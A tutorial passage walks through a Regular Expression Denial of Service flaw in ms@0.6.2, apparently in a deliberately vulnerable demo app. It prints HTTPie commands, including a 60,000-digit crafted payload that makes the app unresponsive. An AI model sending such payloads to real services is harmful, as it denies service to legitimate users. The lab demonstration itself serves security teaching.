Example 3

Our third example vulnerability is with the ms npm package. This is a module that allows easy conversion of various time formats into milliseconds. The issue here is that we are using ms@0.6.2 and this has a Regular Expression Denial of Service (ReDos) vulnerability.

What this package allows us to do is to take a string input and parse into milliseconds which our application will then use to send a reminder. For example:

To demonstrate this vulnerability, we will move to the terminal. Let's run the following command against our application:

echo 'content=Reboot server in 20 minutes' | http --form $GOOF_HOST/create -v

The result will be console output similar to this:

POST /create HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 36
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Host: elb.amazonaws.com
User-Agent: HTTPie/2.1.0
content=Reboot server in 20 minutes
HTTP/1.1 302 Found
Connection: keep-alive
Content-Length: 28
Content-Type: text/html; charset=utf-8
Date: Sat, 13 Jun 2020 21:20:16 GMT
ETag: W/"1c-41a86905"
Location: /
Vary: X-HTTP-Method-Override
X-Powered-By: Express
UmVib290IHNlcnZlciBbMjBtXQ==

A corresponding web result will look like this:

Now we will take the previous command but print the digit 5 a total of 60,000 times. This regular expression will take a non-linear amount of time to process an input. The longer the input, the longer the processing time. Let's run the following command

echo 'content=Reboot server in '\`printf "%.0s5" {1..60000}\`' minutes' | http --form $GOOF_HOST/create -v

The result here was surprisingly fast. However, what happens when the regular expression does not match? To illustrate this, let's take the same command and swap the s in minutes for an a instead. Type the following command:

echo 'content=Reboot server in '\`printf "%.0s5" {1..60000}\`' minutea' | http --form $GOOF_HOST/create -v

This command will take a while to process and result in a non-responsive application. If you try to add or remove tasks the application will not respond and you have blocked legitimate requests from processing.